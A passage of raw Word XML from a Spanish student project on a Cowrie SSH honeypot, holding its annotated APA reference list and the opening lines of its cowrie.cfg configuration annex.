    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Referencias</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Según las normas APA 7.ª edición. Cada referencia se acompaña de un texto descriptivo indicando su uso en el proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Honeypot utilizado en el proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="360"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cowrie Contributors. (s. f.). Cowrie SSH/Telnet Honeypot. GitHub. https://github.com/cowrie/cowrie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Marco de clasificación de la actividad observada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="360"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE Corporation. (s. f.). MITRE ATT&amp;CK. https://attack.mitre.org/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Plataforma cloud del honeypot: servidores y cortafuegos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="360"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Hetzner Online GmbH. (s. f.). Hetzner Cloud. https://www.hetzner.com/cloud/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Verificación de cuentas nuevas en la plataforma cloud.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="360"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Hetzner Online GmbH. (s. f.). Fraud prevention FAQ. Hetzner Docs. https://docs.hetzner.com/general/security-and-identify/fraud-prevention-faq/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Plataforma cloud prevista en el anteproyecto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="360"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle Corporation. (s. f.). Oracle Cloud Free Tier. https://www.oracle.com/cloud/free/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SDK utilizado por el script de aprovisionamiento oci_a1_retry.py.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="360"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle. (s. f.-b). Oracle Cloud Infrastructure Python SDK. https://docs.oracle.com/en-us/iaas/tools/python/latest/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Biblioteca SSH empleada en el ataque simulado de las pruebas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="360"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Paramiko. (s. f.). Paramiko: A Python implementation of SSHv2. https://www.paramiko.org/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Servicio de notificaciones push del script de aprovisionamiento.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="360"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ntfy. (s. f.). ntfy: Send push notifications to your phone or desktop via PUT/POST. https://ntfy.sh/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Límites del tier Always Free y política de recuperación de instancias ociosas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="360"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle. (s. f.-a). Always Free resources. Oracle Cloud Infrastructure Documentation. https://docs.oracle.com/en-us/iaas/Content/FreeTier/freetier_topic-Always_Free_Resources.htm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM para ingesta y visualización de logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="360"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh, Inc. (s. f.). Wazuh – Open Source Security Platform. https://wazuh.com/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Biblioteca de generación de gráficas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="360"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Hunter, J. D. (2007). Matplotlib: A 2D graphics environment. Computing in Science &amp; Engineering, 9(3), 90–95. https://doi.org/10.1109/MCSE.2007.55</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Geolocalización de IPs atacantes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="360"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ip-api. (s. f.). IP Geolocation API. https://ip-api.com/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Referencia sobre ataques SSH y honeypots.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="360"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Provos, N. y Holz, T. (2007). Virtual Honeypots: From Botnet Tracking to Intrusion Detection. Addison-Wesley.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Informes de incidentes de seguridad en España.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="360"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Centro Criptológico Nacional. (2024). CCN-CERT IA – Informe Anual 2024. https://www.ccn-cert.cni.es/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Sistema operativo del servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="360"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Canonical Ltd. (s. f.). Ubuntu Server 24.04 LTS. https://ubuntu.com/server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Distribución para pruebas de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="360"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">OffSec Services Limited. (s. f.). Kali Linux. https://www.kali.org/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis de la botnet Outlaw, identificada en los resultados.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="360"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Souza, C., Muñoz, A. y Ovalle, E. (2025, 29 de abril). Outlaw cybergang attacking targets worldwide. Securelist (Kaspersky). https://securelist.com/outlaw-botnet/116444/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis del minero RedTail, identificado en los resultados.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="360"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Riley, R. (2024, 22 de mayo). Analysis of "redtail" file uploads to ICS honeypot, a multi-architecture coin miner [Guest Diary]. SANS Internet Storm Center. https://isc.sans.edu/diary/30950</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Anexos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Los anexos reproducen los ficheros de configuración y los scripts de despliegue del proyecto tal y como se encuentran en el directorio config/ del repositorio (https://github.com/diegofonterosa/PFC-Cowrie).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Anexo A. Configuración de Cowrie (cowrie.cfg)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Fichero /home/cowrie/honeypot/etc/cowrie.cfg. Solo contiene las claves que difieren de los valores por defecto de Cowrie 3.1.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="12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cowrie.cfg — Configuración del honeypot (PFC-Cowrie)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Proyecto Intermodular ASIR · Diego Pérez Fonterosa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Cowrie 3.x carga primero sus valores por defecto (cowrie.cfg.dist)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  y después este fichero, así que aquí solo van las claves que cambian.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Ruta en el servidor: /home/cowrie/honeypot/etc/cowrie.cfg</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[honeypot]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Nombre de host del sistema falso. El valor por defecto (svr04) es una</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># firma conocida de Cowrie que algunos bots usan para detectar honeypots.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname = web-prod-02</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Un único fichero JSON en vez de uno por día: simplifica el análisis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># con cowrie_analyzer.py durante el periodo de captura.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">logtype = plain</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Las descargas de los atacantes se guardan (para extraer sus hashes)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
